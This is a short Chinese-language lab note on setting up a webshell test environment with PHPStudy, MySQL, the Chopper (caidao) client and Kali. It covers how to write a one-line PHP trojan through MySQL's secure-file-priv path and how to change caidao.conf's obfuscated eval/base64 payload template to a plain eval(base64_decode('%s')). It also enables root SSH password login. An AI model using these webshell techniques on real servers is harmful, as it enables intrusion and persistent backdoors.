遇到的问题
1.一句话木马传不上,配置my.ini也没用
2.菜刀无法显示文件管理
处理方式
放弃解决
在mysql数据库中用命令查找一下可修改文件的路径
show variables like '%secure%';
将一句话木马传到这个指定的路径
后来的解决办法
发现要在网站根目录上上传木马才有效,于是找办法解决
之前改my.ini配置文件的
[mysqld]
secure-file-priv=
一直无效
排查步骤:
1.启动PHPStudy的mysql服务发现一直启动不了
2.输入win+R services.msc发现有一个Mysql在启动
3.点击属性,找到这个mysql的data文件位置(因为我的数据都误放在了这个Mysql)
4.将data文件拷贝到PHPStudy的data文件同目录替换
5.关闭原来的Mysql服务,在PHPStudy中启动mysql服务并修改my.ini即可
菜刀的解决:
在菜刀的配置文件中(caidao.conf)找到:array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));
修改为:eval(base64_decode('%s'));
kali
1.通过xshell传输Windows的文件夹安装burp
2.weevely Ctrl+C退出
3.xshell ssh远程连接不上解决方式—更改配置
vim sshd_config
开启
port 22
PermitRootLogin yes # 允许通过root用户通过ssh登陆
vim ssh_config
开启
port 22
PasswordAuthentication yes
重启服务
systemctl restart ssh.service
update-rc.d ssh enable
安装lrzsz
apt install lrzsz
输入命令rz 选择文件进行上传
但是rz只能传文件,不能传文件夹
所以需要把文件夹压缩再传输zip文件在linux下解压命令
unzip xxx